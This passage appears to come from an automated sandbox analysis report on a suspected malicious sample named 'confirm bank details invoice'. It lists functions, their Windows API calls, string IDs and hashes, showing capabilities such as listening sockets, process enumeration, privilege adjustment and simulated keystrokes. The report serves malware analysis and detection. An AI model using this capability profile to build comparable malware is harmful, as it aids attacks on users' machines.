                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004C8CA8
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8CB7
                    • bind.WSOCK32(00000000,?,00000010), ref: 004C8CD3
                    • listen.WSOCK32(00000000,00000005), ref: 004C8CE2
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8CFC
                    • closesocket.WSOCK32(00000000,00000000), ref: 004C8D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: b865f51d2cff2c59cb6709e61822610c96d25145a6d30af9994c5e4c430066ca
                    • Instruction ID: 7027e1730a6da6e097604f935efca8628e9d33467c614a1cd5fcf4dacbf551f1
                    • Opcode Fuzzy Hash: b865f51d2cff2c59cb6709e61822610c96d25145a6d30af9994c5e4c430066ca
                    • Instruction Fuzzy Hash: 4B2180356001009BC714AF68C985B7EB7E9AF48314F10856EE956AB3D2CB74AD42CB69
                    Function 004B6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004B6554
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004B6564
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 004B6583
                    • __wsplitpath.LIBCMT ref: 004B65A7
                    • _wcscat.LIBCMT ref: 004B65BA
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004B65F9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                    • String ID:
                    • API String ID: 1605983538-0
                    • Opcode ID: 09084e4649f784af2c391b96fb56a375219536ee6051ce4a44e174e60559079b
                    • Instruction ID: 9e8fc44fe6b6e4668504d7c714bcc57acc9fa75e7822ce963896acfc9b656080
                    • Opcode Fuzzy Hash: 09084e4649f784af2c391b96fb56a375219536ee6051ce4a44e174e60559079b
                    • Instruction Fuzzy Hash: A4219871900219BBDB20ABA4DD88FEEBBBDAB44304F5004BAF505D3241DB799F95CB64
                    Function 00479B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$Q
                    • API String ID: 0-2210302715
                    • Opcode ID: c55c1332da09ea8b3f922f70d28eed103b6f75500e1ca711a9395f28179f295f
                    • Instruction ID: 64a4584caa58576cd8acf3dca66693592578f485d92c72540bff5175cc9f495f
                    • Opcode Fuzzy Hash: c55c1332da09ea8b3f922f70d28eed103b6f75500e1ca711a9395f28179f295f
                    • Instruction Fuzzy Hash: EA927C71A0021ACBDF24CF58C9807FEB7B1EB95314F14859BD91AA7380D7789D81CB9A
                    Function 004B13CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 004B13DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($,2R$<2R$|
                    • API String ID: 1659193697-1671734559
                    • Opcode ID: 20c43d8eb330d049c566e24634e73bd63b578b51f066676218ff891c7615efb6
                    • Instruction ID: f9c0c750ad3f5ea5efe56a5b8c6ea2e7147a843e68f9b641d3a9f1255d3dc6bd
                    • Opcode Fuzzy Hash: 20c43d8eb330d049c566e24634e73bd63b578b51f066676218ff891c7615efb6
                    • Instruction Fuzzy Hash: 63323575A007059FCB28DF29C490AAAB7F0FF48320B51C56EE49ADB3A1E774E941CB54
                    Function 004C923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004CA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 004CA84E
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 004C9296
                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 004C92B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorLastinet_addrsocket
                    • String ID:
                    • API String ID: 4170576061-0
                    • Opcode ID: c2a98fc2fcd2329fe618875a0daebf3ed72f5956996ab5346108beec0544dfb8
                    • Instruction ID: fd52b3a3054bf719a646c5248486cc46c7c43963124c4c8f1a08080aed609041
                    • Opcode Fuzzy Hash: c2a98fc2fcd2329fe618875a0daebf3ed72f5956996ab5346108beec0544dfb8
                    • Instruction Fuzzy Hash: DF41F870600100AFDB14BB29C885E7E77EDDF44318F04885EF9569B3D2DB789D018799
                    Function 004BEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 004BEB8A
                    • _wcscmp.LIBCMT ref: 004BEBBA
                    • _wcscmp.LIBCMT ref: 004BEBCF
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004BEBE0
                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 004BEC0E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNext
                    • String ID:
                    • API String ID: 2387731787-0
                    • Opcode ID: e5e7ba9b7594fb7a3f55c1838c90dc71e78c07861c1fbe8e182389628d3cceac
                    • Instruction ID: 811c0ef82a268e181a538d9e4adb8d5ca9ba6d05f98cf4e27ad64422008867a4
                    • Opcode Fuzzy Hash: e5e7ba9b7594fb7a3f55c1838c90dc71e78c07861c1fbe8e182389628d3cceac
                    • Instruction Fuzzy Hash: 4E41C0356042019FCB08DF29C490AEAB7F4FF89324F10455EE95A8B3A1DB79A940CB69
                    Function 004D8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 888c141d456661f9aa497d163e1723ce1f6f1defac93cb2d678b24b14b13259c
                    • Instruction ID: 5a1553b11a543a05539d36204b85b5feff351f0c752b505fae32b2a3aceb25ad
                    • Opcode Fuzzy Hash: 888c141d456661f9aa497d163e1723ce1f6f1defac93cb2d678b24b14b13259c
                    • Instruction Fuzzy Hash: 0B11DD317002116BE7212F269C54A7FBB99EF44320B04042FF849D7381CF78A90386AC
                    Function 0048E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0048E014,75920AE0,0048DEF1,0050DC38,?,?), ref: 0048E02C
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048E03E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: 0a17f2d557ace6edd671ca713c4c07b82f2c648ca527d653227de223a3b09c02
                    • Instruction ID: b74ea98ec44ed8f4681dfee99cd8b4a3b827269a6be25fd8362997d8ad749a32
                    • Opcode Fuzzy Hash: 0a17f2d557ace6edd671ca713c4c07b82f2c648ca527d653227de223a3b09c02
                    • Instruction Fuzzy Hash: 1AD05E34800722AFC7215B61E9086267AD9AF02308F19482AA88192291D6B8C880CB54
                    Function 0048B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0048B22F
                      • Part of subcall function 0048B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0048B5A5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Proc$LongWindow
                    • String ID:
                    • API String ID: 2749884682-0
                    • Opcode ID: 293e37829473169a5d327621ece63d890fc9fdf3a7dd699a211a0a3283409f1e
                    • Instruction ID: 4d3d1f3de93a9d84cd9345f35a30823707bd341f9aa2a67431bd159b2059fa7f
                    • Opcode Fuzzy Hash: 293e37829473169a5d327621ece63d890fc9fdf3a7dd699a211a0a3283409f1e
                    • Instruction Fuzzy Hash: 4AA14360114105BEEA387A2B4C9DE7F295CEB56349B14491FF802D6792CB2C9C02A3FF
                    Function 004C4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004C43BF,00000000), ref: 004C4FA6
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 004C4FD2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 73a2b7b2a6bb5150ba013ee9216ffe8d35c171d3f7596e92a3064e7a1ce4e8cc
                    • Instruction ID: 9accd88008b56b401ad54e11162f139badf7147e731088ade3d21091da392d67
                    • Opcode Fuzzy Hash: 73a2b7b2a6bb5150ba013ee9216ffe8d35c171d3f7596e92a3064e7a1ce4e8cc
                    • Instruction Fuzzy Hash: 90410A75504209BFEB60DE81DD81FBF77BCEB80758F10002FF605A6281D679AE41D668
                    Function 004777B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: \QR
                    • API String ID: 4104443479-3156365835
                    • Opcode ID: 2404f1de44be5307ffede1c155fcc0f068c0437f51e93258d0dfcb7995a8b0b7
                    • Instruction ID: f5814a0e61bd225ce4a9874c5a48d1bad877c678ef56801fb19993883df9baf6
                    • Opcode Fuzzy Hash: 2404f1de44be5307ffede1c155fcc0f068c0437f51e93258d0dfcb7995a8b0b7
                    • Instruction Fuzzy Hash: 37A25C70904219CFDB24CF58C4806EDBBB1FF48314F6581AAD859AB391D7789E82CF99
                    Function 004BE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BE20D
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 004BE267
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 004BE2B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 08f34e66528def62d7520a79c0dd5e9704981d46af2753ff4115e6ae2b29c906
                    • Instruction ID: 75483ac08e7981cd8ecd1b0c864ef399b8a994a8ff2f362809dd54eac5cd717e
                    • Opcode Fuzzy Hash: 08f34e66528def62d7520a79c0dd5e9704981d46af2753ff4115e6ae2b29c906
                    • Instruction Fuzzy Hash: D5216D35A00118EFCB00EFA5D984AEDBBF8FF49314F0484AAE905A7351DB359915CB64
                    Function 004AB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048F4EA: std::exception::exception.LIBCMT ref: 0048F51E
                      • Part of subcall function 0048F4EA: __CxxThrowException@8.LIBCMT ref: 0048F533
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004AB180
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004AB1AD
                    • GetLastError.KERNEL32 ref: 004AB1BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: f311962182ea5e6e6cc1c75f433235292ddbf115a857f1177632039a6743bb55
                    • Instruction ID: b20713903d67e2bc97bf8eb302a987e8b8c745ae829d1101f434bf9e42c1fe19
                    • Opcode Fuzzy Hash: f311962182ea5e6e6cc1c75f433235292ddbf115a857f1177632039a6743bb55
                    • Instruction Fuzzy Hash: 9611BCB2800204AFE718AF64DC86D2BBBADEB55754B20892EE45693241DB74FC41CB68
                    Function 004B6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004B6623
                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 004B6664
                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 004B666F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle
                    • String ID:
                    • API String ID: 33631002-0
                    • Opcode ID: 938bd37b2a6c4cd38de94622b775ebfc32be4e3525c2e6b2fe9eb9551c9075be
                    • Instruction ID: 5c0414a81dac2e0854ac3263b6e17f89ab83e9e448379e5a580196f39f2dc67b
                    • Opcode Fuzzy Hash: 938bd37b2a6c4cd38de94622b775ebfc32be4e3525c2e6b2fe9eb9551c9075be
                    • Instruction Fuzzy Hash: 81110C71E01228BFDB108FA99C45BEEBBBDEB45B10F104166F900E6290D6B45A058BA5
                    Function 004B71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004B7223
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004B723A
                    • FreeSid.ADVAPI32(?), ref: 004B724A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 355558891d3942858355f625b725482d378137207091fd348eed382c140c09d1
                    • Instruction ID: 878bab11bfc5c53c2a06a195cd2aa83cfc9537022c35f393bec9cbad5ba5a4c3
                    • Opcode Fuzzy Hash: 355558891d3942858355f625b725482d378137207091fd348eed382c140c09d1
                    • Instruction Fuzzy Hash: 00F01D76E04209BFDF04DFE4DD89EFEBBB9EF08305F104469A602E2191E6749A54CB14
                    Function 004BF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 004BF599
                    • FindClose.KERNEL32(00000000), ref: 004BF5C9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: ef84938f9228db2d664ab7607bc412a75fd05ea46b8edf0bb153115a70a4202f
                    • Instruction ID: ad2bde1919082fcb8dd866048ce8c04e9578e50f1069e84676d83725981db0de
                    • Opcode Fuzzy Hash: ef84938f9228db2d664ab7607bc412a75fd05ea46b8edf0bb153115a70a4202f
                    • Instruction Fuzzy Hash: 7111A1316002009FD710EF29D845A7EB3E9FF84324F00892EF8A9D7291DB74AD058B99
                    Function 004BCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004CBE6A,?,?,00000000,?), ref: 004BCEA7
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004CBE6A,?,?,00000000,?), ref: 004BCEB9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: f207bbcdf89c30169942799ca3ded1d175a31dc03afaaacdf6704b798d9c8371
                    • Instruction ID: 7c644d1d9984f50c26c8de50015c022c296eefa12289359f4f7e002d4d0fc66f
                    • Opcode Fuzzy Hash: f207bbcdf89c30169942799ca3ded1d175a31dc03afaaacdf6704b798d9c8371
                    • Instruction Fuzzy Hash: 64F08231500229EBDB10ABA4DCC9FFA776DBF08355F00816AF919D6181D734DA54CBA5
                    Function 004B411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004B4153
                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 004B4166
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
